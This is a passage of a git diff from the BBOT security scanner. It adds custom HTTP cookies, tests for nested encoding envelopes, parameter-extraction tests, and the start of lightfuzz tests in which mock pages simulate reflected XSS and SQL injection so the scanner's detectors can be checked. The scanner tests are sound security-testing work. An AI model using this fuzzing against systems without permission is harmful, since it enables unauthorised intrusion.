custom_cookies_dict + # --fast-mode if self.parsed.fast_mode: self.parsed.preset += ["fast"] diff --git a/bbot/scanner/scanner.py b/bbot/scanner/scanner.py index 3817f26b21..2036b9d1ff 100644 --- a/bbot/scanner/scanner.py +++ b/bbot/scanner/scanner.py @@ -213,6 +213,12 @@ def __init__( self.warning( "You have enabled custom HTTP headers. These will be attached to all in-scope requests and all requests made by httpx." ) + # custom HTTP cookies warning + self.custom_http_cookies = self.web_config.get("http_cookies", {}) + if self.custom_http_cookies: + self.warning( + "You have enabled custom HTTP cookies. These will be attached to all in-scope requests and all requests made by httpx." 
+ ) # url file extensions self.url_extension_blacklist = {e.lower() for e in self.config.get("url_extension_blacklist", [])} diff --git a/bbot/test/test_step_1/test_helpers.py b/bbot/test/test_step_1/test_helpers.py index 9cec291941..12fb15278f 100644 --- a/bbot/test/test_step_1/test_helpers.py +++ b/bbot/test/test_step_1/test_helpers.py @@ -460,6 +460,13 @@ async def test_helpers_misc(helpers, scan, bbot_scanner, bbot_httpserver): s = "asdf {unused} {used}" assert helpers.safe_format(s, used="fdsa") == "asdf {unused} fdsa" + # is_printable + assert helpers.is_printable("asdf") is True + assert helpers.is_printable(r"""~!@#$^&*()_+=-<>:"?,./;'[]\{}|""") is True + assert helpers.is_printable("ドメイン.テスト") is True + assert helpers.is_printable("4") is True + assert helpers.is_printable("asdf\x00") is False + # punycode assert helpers.smart_encode_punycode("ドメイン.テスト") == "xn--eckwd4c7c.xn--zckzah" assert helpers.smart_decode_punycode("xn--eckwd4c7c.xn--zckzah") == "ドメイン.テスト" diff --git a/bbot/test/test_step_1/test_web.py b/bbot/test/test_step_1/test_web.py index e07ed3d7d4..4d324abced 100644 --- a/bbot/test/test_step_1/test_web.py +++ b/bbot/test/test_step_1/test_web.py @@ -478,3 +478,24 @@ async def test_web_cookies(bbot_scanner, httpx_mock): assert not client2.cookies await scan._cleanup() + + +@pytest.mark.asyncio +async def test_http_sendcookies(bbot_scanner, bbot_httpserver): + endpoint = "/" + url = bbot_httpserver.url_for(endpoint) + from werkzeug.wrappers import Response + + def echo_cookies_handler(request): + cookies = request.cookies + cookie_str = "; ".join([f"{key}={value}" for key, value in cookies.items()]) + return Response(f"Echoed Cookies: {cookie_str}\nEchoed Headers: {request.headers}") + + bbot_httpserver.expect_request(uri=endpoint).respond_with_handler(echo_cookies_handler) + scan1 = bbot_scanner("127.0.0.1", config={"web": {"debug": True}}) + r1 = await scan1.helpers.request(url, cookies={"foo": "bar"}) + print(r1.text) + + assert r1 is not None, 
"Request to self-signed SSL server went through even with ssl_verify=True" + assert "bar" in r1.text + await scan1._cleanup() diff --git a/bbot/test/test_step_1/test_web_envelopes.py b/bbot/test/test_step_1/test_web_envelopes.py new file mode 100644 index 0000000000..79da9e829e --- /dev/null +++ b/bbot/test/test_step_1/test_web_envelopes.py @@ -0,0 +1,339 @@ +import pytest + + +async def test_web_envelopes(): + from bbot.core.helpers.web.envelopes import ( + BaseEnvelope, + TextEnvelope, + HexEnvelope, + B64Envelope, + JSONEnvelope, + XMLEnvelope, + URLEnvelope, + ) + + # simple text + text_envelope = BaseEnvelope.detect("foo") + assert isinstance(text_envelope, TextEnvelope) + assert text_envelope.unpacked_data() == "foo" + assert text_envelope.subparams == {"__default__": "foo"} + expected_subparams = [([], "foo")] + assert list(text_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert text_envelope.get_subparam(subparam) == value + assert text_envelope.pack() == "foo" + assert text_envelope.num_envelopes == 0 + assert text_envelope.get_subparam() == "foo" + text_envelope.set_subparam(value="bar") + assert text_envelope.get_subparam() == "bar" + assert text_envelope.unpacked_data() == "bar" + + # simple binary + # binary_envelope = BaseEnvelope.detect("foo\x00") + # assert isinstance(binary_envelope, BinaryEnvelope) + # assert binary_envelope.unpacked_data == "foo\x00" + # assert binary_envelope.packed_data == "foo\x00" + # assert binary_envelope.subparams == {"__default__": "foo\x00"} + + # text encoded as hex + hex_envelope = BaseEnvelope.detect("706172616d") + assert isinstance(hex_envelope, HexEnvelope) + assert hex_envelope.unpacked_data(recursive=True) == "param" + hex_inner_envelope = hex_envelope.unpacked_data(recursive=False) + assert isinstance(hex_inner_envelope, TextEnvelope) + assert hex_inner_envelope.unpacked_data(recursive=False) == "param" + assert hex_inner_envelope.unpacked_data(recursive=True) 
== "param" + assert list(hex_envelope.get_subparams(recursive=False)) == [([], hex_inner_envelope)] + assert list(hex_envelope.get_subparams(recursive=True)) == [([], "param")] + assert hex_inner_envelope.unpacked_data() == "param" + assert hex_inner_envelope.subparams == {"__default__": "param"} + expected_subparams = [([], "param")] + assert list(hex_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_inner_envelope.get_subparam(subparam) == value + assert hex_envelope.pack() == "706172616d" + assert hex_envelope.num_envelopes == 1 + assert hex_envelope.get_subparam() == "param" + hex_envelope.set_subparam(value="asdf") + assert hex_envelope.get_subparam() == "asdf" + assert hex_envelope.unpacked_data() == "asdf" + assert hex_envelope.pack() == "61736466" + + # text encoded as base64 + base64_envelope = BaseEnvelope.detect("cGFyYW0=") + assert isinstance(base64_envelope, B64Envelope) + assert base64_envelope.unpacked_data() == "param" + base64_inner_envelope = base64_envelope.unpacked_data(recursive=False) + assert isinstance(base64_inner_envelope, TextEnvelope) + assert list(base64_envelope.get_subparams(recursive=False)) == [([], base64_inner_envelope)] + assert list(base64_envelope.get_subparams()) == [([], "param")] + assert base64_inner_envelope.pack() == "param" + assert base64_inner_envelope.unpacked_data() == "param" + assert base64_inner_envelope.subparams == {"__default__": "param"} + expected_subparams = [([], "param")] + assert list(base64_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_inner_envelope.get_subparam(subparam) == value + assert base64_envelope.num_envelopes == 1 + base64_envelope.set_subparam(value="asdf") + assert base64_envelope.get_subparam() == "asdf" + assert base64_envelope.unpacked_data() == "asdf" + assert base64_envelope.pack() == "YXNkZg==" + + # test inside hex inside base64 + hex_envelope = 
BaseEnvelope.detect("634746795957303d") + assert isinstance(hex_envelope, HexEnvelope) + assert hex_envelope.get_subparam() == "param" + assert hex_envelope.unpacked_data() == "param" + base64_envelope = hex_envelope.unpacked_data(recursive=False) + assert isinstance(base64_envelope, B64Envelope) + assert base64_envelope.get_subparam() == "param" + assert base64_envelope.unpacked_data() == "param" + text_envelope = base64_envelope.unpacked_data(recursive=False) + assert isinstance(text_envelope, TextEnvelope) + assert text_envelope.get_subparam() == "param" + assert text_envelope.unpacked_data() == "param" + hex_envelope.set_subparam(value="asdf") + assert hex_envelope.get_subparam() == "asdf" + assert hex_envelope.unpacked_data() == "asdf" + assert text_envelope.get_subparam() == "asdf" + assert text_envelope.unpacked_data() == "asdf" + assert base64_envelope.get_subparam() == "asdf" + assert base64_envelope.unpacked_data() == "asdf" + + # URL-encoded text + url_encoded_envelope = BaseEnvelope.detect("a%20b%20c") + assert isinstance(url_encoded_envelope, URLEnvelope) + assert url_encoded_envelope.pack() == "a%20b%20c" + assert url_encoded_envelope.unpacked_data() == "a b c" + url_inner_envelope = url_encoded_envelope.unpacked_data(recursive=False) + assert isinstance(url_inner_envelope, TextEnvelope) + assert url_inner_envelope.unpacked_data(recursive=False) == "a b c" + assert url_inner_envelope.unpacked_data(recursive=True) == "a b c" + assert list(url_encoded_envelope.get_subparams(recursive=False)) == [([], url_inner_envelope)] + assert list(url_encoded_envelope.get_subparams(recursive=True)) == [([], "a b c")] + assert url_inner_envelope.pack() == "a b c" + assert url_inner_envelope.unpacked_data() == "a b c" + assert url_inner_envelope.subparams == {"__default__": "a b c"} + expected_subparams = [([], "a b c")] + assert list(url_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert 
url_inner_envelope.get_subparam(subparam) == value + assert url_encoded_envelope.num_envelopes == 1 + url_encoded_envelope.set_subparam(value="a s d f") + assert url_encoded_envelope.get_subparam() == "a s d f" + assert url_encoded_envelope.unpacked_data() == "a s d f" + assert url_encoded_envelope.pack() == "a%20s%20d%20f" + + # json + json_envelope = BaseEnvelope.detect('{"param1": "val1", "param2": {"param3": "val3"}}') + assert isinstance(json_envelope, JSONEnvelope) + assert json_envelope.pack() == '{"param1": "val1", "param2": {"param3": "val3"}}' + assert json_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.unpacked_data(recursive=False) == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.unpacked_data(recursive=True) == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.subparams == {"param1": "val1", "param2": {"param3": "val3"}} + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert json_envelope.get_subparam(subparam) == value + json_envelope.selected_subparam = ["param2", "param3"] + assert json_envelope.get_subparam() == "val3" + assert json_envelope.num_envelopes == 1 + + # xml + xml_envelope = BaseEnvelope.detect( + 'val1val3' + ) + assert isinstance(xml_envelope, XMLEnvelope) + assert ( + xml_envelope.pack() + == '\nval1val3' + ) + assert xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.unpacked_data(recursive=False) == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.unpacked_data(recursive=True) == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.subparams == { + "root": 
{"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + expected_subparams = [ + (["root", "param1", "@attr"], "attr1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert xml_envelope.get_subparam(subparam) == value + assert xml_envelope.num_envelopes == 1 + + # json inside base64 + base64_json_envelope = BaseEnvelope.detect("eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19") + assert isinstance(base64_json_envelope, B64Envelope) + assert base64_json_envelope.pack() == "eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19" + assert base64_json_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + base64_inner_envelope = base64_json_envelope.unpacked_data(recursive=False) + assert isinstance(base64_inner_envelope, JSONEnvelope) + assert base64_inner_envelope.pack() == '{"param1": "val1", "param2": {"param3": "val3"}}' + assert base64_inner_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + assert base64_inner_envelope.subparams == {"param1": "val1", "param2": {"param3": "val3"}} + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + assert base64_json_envelope.num_envelopes == 2 + with pytest.raises(ValueError): + assert base64_json_envelope.get_subparam() + base64_json_envelope.selected_subparam = ["param2", "param3"] + assert base64_json_envelope.get_subparam() == "val3" + + # xml inside url inside hex inside base64 + nested_xml_envelope = BaseEnvelope.detect( + 
"MjUzMzYzMjUzNzMyMjUzNjY2MjUzNjY2MjUzNzM0MjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMxMjUzMjMwMjUzNjMxMjUzNzM0MjUzNzM0MjUzNzMyMjUzMzY0MjUzMjMyMjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMxMjUzMjMyMjUzMzY1MjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMxMjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMxMjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMyMjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMzMjUzMzY1MjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMzMjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMzMjUzMzY1MjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMyMjUzMzY1MjUzMzYzMjUzMjY2MjUzNzMyMjUzNjY2MjUzNjY2MjUzNzM0MjUzMzY1" + ) + assert isinstance(nested_xml_envelope, B64Envelope) + assert nested_xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert ( + nested_xml_envelope.pack() + == "MjUzMzQzMjUzMzQ2Nzg2ZDZjMjUzMjMwNzY2NTcyNzM2OTZmNmUyNTMzNDQyNTMyMzIzMTJlMzAyNTMyMzIyNTMyMzA2NTZlNjM2ZjY0Njk2ZTY3MjUzMzQ0MjUzMjMyNzU3NDY2MmQzODI1MzIzMjI1MzM0NjI1MzM0NTI1MzA0MTI1MzM0MzcyNmY2Zjc0MjUzMzQ1MjUzMzQzNzA2MTcyNjE2ZDMxMjUzMjMwNjE3NDc0NzIyNTMzNDQyNTMyMzI3NjYxNmMzMTI1MzIzMjI1MzM0NTc2NjE2YzMxMjUzMzQzMmY3MDYxNzI2MTZkMzEyNTMzNDUyNTMzNDM3MDYxNzI2MTZkMzIyNTMzNDUyNTMzNDM3MDYxNzI2MTZkMzMyNTMzNDU3NjYxNmMzMzI1MzM0MzJmNzA2MTcyNjE2ZDMzMjUzMzQ1MjUzMzQzMmY3MDYxNzI2MTZkMzIyNTMzNDUyNTMzNDMyZjcyNmY2Zjc0MjUzMzQ1" + ) + inner_hex_envelope = nested_xml_envelope.unpacked_data(recursive=False) + assert isinstance(inner_hex_envelope, HexEnvelope) + assert ( + inner_hex_envelope.pack() + == "253343253346786d6c25323076657273696f6e253344253232312e30253232253230656e636f64696e672533442532327574662d38253232253346253345253041253343726f6f74253345253343706172616d312532306174747225334425323276616c3125323225334576616c312533432f706172616d31253345253343706172616d32253345253343706172616d3325334576616c332533432f706172616d332533452533432f706172616d322533452533432f726f6f74253345" + ) + 
inner_url_envelope = inner_hex_envelope.unpacked_data(recursive=False) + assert isinstance(inner_url_envelope, URLEnvelope) + assert ( + inner_url_envelope.pack() + == r"%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0A%3Croot%3E%3Cparam1%20attr%3D%22val1%22%3Eval1%3C/param1%3E%3Cparam2%3E%3Cparam3%3Eval3%3C/param3%3E%3C/param2%3E%3C/root%3E" + ) + inner_xml_envelope = inner_url_envelope.unpacked_data(recursive=False) + assert isinstance(inner_xml_envelope, XMLEnvelope) + assert ( + inner_xml_envelope.pack() + == '\nval1val3' + ) + assert inner_xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert inner_xml_envelope.subparams == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + expected_subparams = [ + (["root", "param1", "@attr"], "val1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(nested_xml_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert nested_xml_envelope.get_subparam(subparam) == value + assert nested_xml_envelope.num_envelopes == 4 + + # manipulating text inside hex + hex_envelope = BaseEnvelope.detect("706172616d") + expected_subparams = [([], "param")] + assert list(hex_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_envelope.get_subparam(subparam) == value + hex_envelope.set_subparam([], "asdf") + expected_subparams = [([], "asdf")] + assert list(hex_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_envelope.get_subparam(subparam) == value + assert hex_envelope.unpacked_data() == "asdf" + + # manipulating json inside base64 + base64_json_envelope = BaseEnvelope.detect("eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19") + expected_subparams = [ + (["param1"], "val1"), + 
(["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + base64_json_envelope.set_subparam(["param1"], {"asdf": [None], "fdsa": 1.0}) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + base64_json_envelope.set_subparam(["param2", "param3"], {"1234": [None], "4321": 1.0}) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2", "param3", "1234"], [None]), + (["param2", "param3", "4321"], 1.0), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + base64_json_envelope.set_subparam(["param2"], None) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2"], None), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + + # xml inside url inside base64 + xml_envelope = BaseEnvelope.detect( + "JTNDP3htbCUyMHZlcnNpb249JTIyMS4wJTIyJTIwZW5jb2Rpbmc9JTIydXRmLTglMjI/JTNFJTBBJTNDcm9vdCUzRSUzQ3BhcmFtMSUyMGF0dHI9JTIydmFsMSUyMiUzRXZhbDElM0MvcGFyYW0xJTNFJTNDcGFyYW0yJTNFJTNDcGFyYW0zJTNFdmFsMyUzQy9wYXJhbTMlM0UlM0MvcGFyYW0yJTNFJTNDL3Jvb3QlM0U=" + ) + assert ( + xml_envelope.pack() + == "JTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIydXRmLTglMjIlM0YlM0UlMEElM0Nyb290JTNFJTNDcGFyYW0xJTIwYXR0ciUzRCUyMnZhbDElMjIlM0V2YWwxJTNDL3BhcmFtMSUzRSUzQ3BhcmFtMiUzRSUzQ3BhcmFtMyUzRXZhbDMlM0MvcGFyYW0zJTNFJTNDL3BhcmFtMiUzRSUzQy9yb290JTNF" + ) + expected_subparams = [ + (["root", "param1", "@attr"], "val1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == 
expected_subparams + xml_envelope.set_subparam(["root", "param1", "@attr"], "asdf") + expected_subparams = [ + (["root", "param1", "@attr"], "asdf"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + assert ( + xml_envelope.pack() + == "JTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIydXRmLTglMjIlM0YlM0UlMEElM0Nyb290JTNFJTNDcGFyYW0xJTIwYXR0ciUzRCUyMmFzZGYlMjIlM0V2YWwxJTNDL3BhcmFtMSUzRSUzQ3BhcmFtMiUzRSUzQ3BhcmFtMyUzRXZhbDMlM0MvcGFyYW0zJTNFJTNDL3BhcmFtMiUzRSUzQy9yb290JTNF" + ) + xml_envelope.set_subparam(["root", "param2", "param3"], {"1234": [None], "4321": 1.0}) + expected_subparams = [ + (["root", "param1", "@attr"], "asdf"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3", "1234"], [None]), + (["root", "param2", "param3", "4321"], 1.0), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + + # null + null_envelope = BaseEnvelope.detect("null") + assert isinstance(null_envelope, JSONEnvelope) + assert null_envelope.unpacked_data() is None + assert null_envelope.pack() == "null" + expected_subparams = [([], None)] + assert list(null_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert null_envelope.get_subparam(subparam) == value + + tiny_base64 = BaseEnvelope.detect("YWJi") + assert isinstance(tiny_base64, TextEnvelope) diff --git a/bbot/test/test_step_2/module_tests/test_module_excavate.py b/bbot/test/test_step_2/module_tests/test_module_excavate.py index e4e9c907c9..76975b69f2 100644 --- a/bbot/test/test_step_2/module_tests/test_module_excavate.py +++ b/bbot/test/test_step_2/module_tests/test_module_excavate.py @@ -133,7 +133,7 @@ async def setup_before_prep(self, module_test): def check(self, module_test, events): root_relative_detection = False page_relative_detection_1 = False - page_relative_detection_1 = False + page_relative_detection_2 = False 
root_page_confusion_1 = False root_page_confusion_2 = False @@ -451,26 +451,36 @@ class TestExcavateParameterExtraction(TestExcavate): $.post("/test", {jquerypost: "value2"}); -

Simple GET Form

Use the form below to submit a GET request:

-

+

Simple POST Form

Use the form below to submit a POST request:

-

+

+ +
+

Simple Generic Form

+

Use the form below to submit a request:

+
+ +

Links

href img - + """ @@ -483,12 +493,15 @@ def check(self, module_test, events): found_jquery_post = False found_form_get = False found_form_post = False + found_form_generic = False found_jquery_get_original_value = False found_jquery_post_original_value = False found_form_get_original_value = False found_form_post_original_value = False + found_form_generic_original_value = False found_htmltags_a = False found_htmltags_img = False + found_select_noquotes = False for e in events: if e.type == "WEB_PARAMETER": @@ -502,16 +515,21 @@ def check(self, module_test, events): if e.data["original_value"] == "value2": found_jquery_post_original_value = True - if e.data["description"] == "HTTP Extracted Parameter [q] (GET Form Submodule)": + if e.data["description"] == "HTTP Extracted Parameter [q1] (GET Form Submodule)": found_form_get = True if e.data["original_value"] == "flowers": found_form_get_original_value = True - if e.data["description"] == "HTTP Extracted Parameter [q] (POST Form Submodule)": + if e.data["description"] == "HTTP Extracted Parameter [q2] (POST Form Submodule)": found_form_post = True if e.data["original_value"] == "boats": found_form_post_original_value = True + if e.data["description"] == "HTTP Extracted Parameter [q3] (Generic Form Submodule)": + found_form_generic = True + if e.data["original_value"] == "candles": + found_form_generic_original_value = True + if e.data["description"] == "HTTP Extracted Parameter [age] (HTML Tags Submodule)": if e.data["original_value"] == "456": if "id" in e.data["additional_params"].keys(): @@ -522,18 +540,100 @@ def check(self, module_test, events): if "fit" in e.data["additional_params"].keys(): found_htmltags_img = True + if ( + e.data["description"] + == "HTTP Extracted Parameter [blog-post-author-display] (POST Form Submodule)" + ): + if e.data["original_value"] == "user.name": + if "csrf" in e.data["additional_params"].keys(): + found_select_noquotes = True + assert found_jquery_get, "Did not extract Jquery GET 
parameters" assert found_jquery_post, "Did not extract Jquery POST parameters" assert found_form_get, "Did not extract Form GET parameters" assert found_form_post, "Did not extract Form POST parameters" + assert found_form_generic, "Did not extract Form (Generic) parameters" assert found_jquery_get_original_value, "Did not extract Jquery GET parameter original_value" assert found_jquery_post_original_value, "Did not extract Jquery POST parameter original_value" assert found_form_get_original_value, "Did not extract Form GET parameter original_value" assert found_form_post_original_value, "Did not extract Form POST parameter original_value" + assert found_form_generic_original_value, "Did not extract Form (Generic) parameter original_value" assert found_htmltags_a, "Did not extract parameter(s) from a-tag" assert found_htmltags_img, "Did not extract parameter(s) from img-tag" + assert found_select_noquotes, "Did not extract parameter(s) from select-tag" + + +class TestExcavateParameterExtraction_postformnoaction(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + postformnoaction_extract_html = """ + +

Post for without action

+
+ + +

+ +
+ + """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.postformnoaction_extract_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_getparam_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [state] (POST Form (no action) Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" +class TestExcavateParameterExtraction_additionalparams(ModuleTestBase): + + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + postformnoaction_extract_multiparams_html = """ + +

Post for without action

+
+ + + + +
+ + """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.postformnoaction_extract_multiparams_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + + excavate_additionalparam_extraction_param1 = False + excavate_additionalparam_extraction_param2 = False + excavate_additionalparam_extraction_param3 = False + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["name"] == "template-action" and "csrf" in e.data["additional_params"].keys() and "template" in e.data["additional_params"].keys(): + excavate_additionalparam_extraction_param1 = True + if e.data["name"] == "template" and "csrf" in e.data["additional_params"].keys() and "template-action" in e.data["additional_params"].keys(): + excavate_additionalparam_extraction_param2 = True + if e.data["name"] == "csrf" and "template" in e.data["additional_params"].keys() and "template-action" in e.data["additional_params"].keys(): + excavate_additionalparam_extraction_param3 = True + assert excavate_additionalparam_extraction_param1, "Excavate failed to extract web parameter with correct additional data (param 1)" + assert excavate_additionalparam_extraction_param2, "Excavate failed to extract web parameter with correct additional data (param 2)" + assert excavate_additionalparam_extraction_param3, "Excavate failed to extract web parameter with correct additional data (param 3)" + class TestExcavateParameterExtraction_getparam(ModuleTestBase): targets = ["http://127.0.0.1:8888/"] @@ -556,6 +656,75 @@ def check(self, module_test, events): assert excavate_getparam_extraction, "Excavate failed to extract web parameter" +class TestExcavateParameterExtraction_relativeurl(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", 
"hunt"] + config_overrides = {"web": {"spider_distance": 2, "spider_depth": 3}} + + # Secondary page that has a relative link to a traversal URL + secondary_page_html = """ + + Go to root + + """ + + # Primary page that leads to the secondary page + primary_page_html = """ + + Go to secondary page + + """ + + # Root page content + root_page_html = "Root page" + + async def setup_after_prep(self, module_test): + module_test.httpserver.expect_request("/").respond_with_data(self.primary_page_html) + module_test.httpserver.expect_request("/secondary").respond_with_data(self.secondary_page_html) + module_test.httpserver.expect_request("/root.html").respond_with_data(self.root_page_html) + + def check(self, module_test, events): + # Validate that the traversal was successful and WEB_PARAMETER was extracted + traversed_to_root = False + parameter_extraction_found = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter" in e.data["description"]: + parameter_extraction_found = True + + if e.type == "URL": + if "root.html" in e.parsed_url.path: + traversed_to_root = True + + assert traversed_to_root, "Failed to follow the relative traversal to /root.html" + assert parameter_extraction_found, "Excavate failed to extract parameter after traversal" + + +class TestExcavateParameterExtraction_getparam_novalue(TestExcavateParameterExtraction_getparam): + getparam_extract_html = """ + + """ + + def check(self, module_test, events): + excavate_getparam_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [searchTerm] (GET Form Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" + + class TestExcavateParameterExtraction_json(ModuleTestBase): targets = ["http://127.0.0.1:8888/"] modules_overrides = ["httpx", "excavate", "paramminer_getparams"] @@ -610,6 +779,75 @@ def check(self, module_test, 
events): assert excavate_xml_extraction, "Excavate failed to extract xml parameter" +class TestExcavateParameterExtraction_inputtagnovalue(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + getparam_extract_html = """ +
+ """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.getparam_extract_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_getparam_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [novalue] (GET Form Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" + + +class TestExcavateParameterExtraction_jqueryjsonajax(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "hunt"] + jsonajax_extract_html = """ + + + + +

test

+ + + """ + return Response(xss_block, status=200) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + expect_args = re.compile("/otherpage.php") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + original_value_captured = False + xss_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [language]" in e.data["description"]: + web_parameter_emitted = True + if e.data["original_value"] == "en": + original_value_captured = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [language] Context: [In Javascript]" in e.data["description"]: + xss_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert original_value_captured, "original_value not captured" + assert xss_finding_emitted, "In Javascript XSS FINDING not emitted" + + +# SQLI Single Quote/Two Single Quote (getparam) +class Test_Lightfuzz_sqli(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + parameter_block = """ + + """ + if "search=" in qs: + value = 